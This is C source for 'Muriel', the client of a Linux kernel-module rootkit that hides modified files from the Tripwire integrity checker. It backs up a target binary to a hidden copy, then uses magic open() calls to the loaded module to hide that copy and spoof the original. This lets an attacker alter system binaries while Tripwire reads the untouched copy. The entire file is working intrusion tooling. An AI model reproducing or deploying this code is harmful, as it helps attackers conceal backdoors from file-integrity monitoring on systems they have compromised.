#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>

#include "magic.h"

#define VERIFY_MAGIC_RETURN			if (ret==MAGIC_RETURN) \
					  fprintf(stderr, "Done.\n"); \
			else { \
					  fprintf(stderr, "Oupss ! Something mistake...\n"); \
					  _exit(1); \
			}

 

void banner(char * progname) {
		  fprintf(stderr, "Muriel - Client for Murielkm 1.0\n");
		  fprintf(stderr, "---\nLkm to hide file from Tripwire Checking\n");
		  fprintf(stderr, "\nusage: %s [-remove] [hacked_file hidden_file]\n\n", progname);
		  _exit(0); 
}

void checkfile2hack(char * s) {
		  int ret= open(s, O_RDONLY);
		  if (ret<0) {
					 fprintf(stderr, "Unable to read %s.\n", s);
					 _exit(1);
		  }
		  close(ret);
}

int main(char argc, char * argv[]) {
		  char * hacked_file, *hidde_file;
		  char * cpcommand;
		  int ret;
		 
			if (argc==2) {
					  if (!strcmp(argv[1], "-remove")) {
								 fprintf(stderr, "Not implemented yet.\n");
								 _exit(1);
					  } else 
								 banner(argv[0]);
			}
		  
		  if (argc!=3) 
					 banner(argv[0]);
		  ret= open(NULL, MAGIC_FLAG, MAGIC_MODE4);
		  if (ret==MAGIC_RETURN) {
					 fprintf(stderr, "muriellm is here.. good !\n");
		  } else {
					 fprintf(stderr, "Load murielkm first !\n insmod murielkm\n");
					 _exit(1);
		  }
					 
		  hacked_file= argv[1];
		  hidde_file= argv[2];
		  
		  checkfile2hack(hacked_file);	
		  fprintf(stderr, "Make backup of %s to %s.\n", 
								hacked_file, hidde_file);
		  cpcommand= (char*) malloc(strlen(hacked_file)+strlen(hidde_file)+19);
		  sprintf(cpcommand, "/bin/cp -f %s %s", hacked_file, hidde_file);
		  fprintf(stderr, "Do %s\n", cpcommand);
		  ret= system(cpcommand);
		  if (ret<0) {
					 fprintf(stderr, "Copy failed :o(\n");
					 _exit(1);
		  }
		 
		  fprintf(stderr, "Ask murielkm to hidde %s...\n", hidde_file);
		  ret= open(hidde_file, MAGIC_FLAG, MAGIC_MODE1); 
		  VERIFY_MAGIC_RETURN;
		  
		  fprintf(stderr, "Ask murielkm to spoof %s...\n", hacked_file);
		  ret= open(hacked_file, MAGIC_FLAG, MAGIC_MODE2); 
		  VERIFY_MAGIC_RETURN;

		  fprintf(stderr, "Activate murielkm...\n");
		  ret= open(NULL, MAGIC_FLAG, MAGIC_MODE3);
		  VERIFY_MAGIC_RETURN;
		  fprintf(stderr, "\nYou can modify %s, Tripwire will use:
\t- %s for binary core
\t- original %s for file parameters (inode...).\n",
								hacked_file, hidde_file, hacked_file);
} 
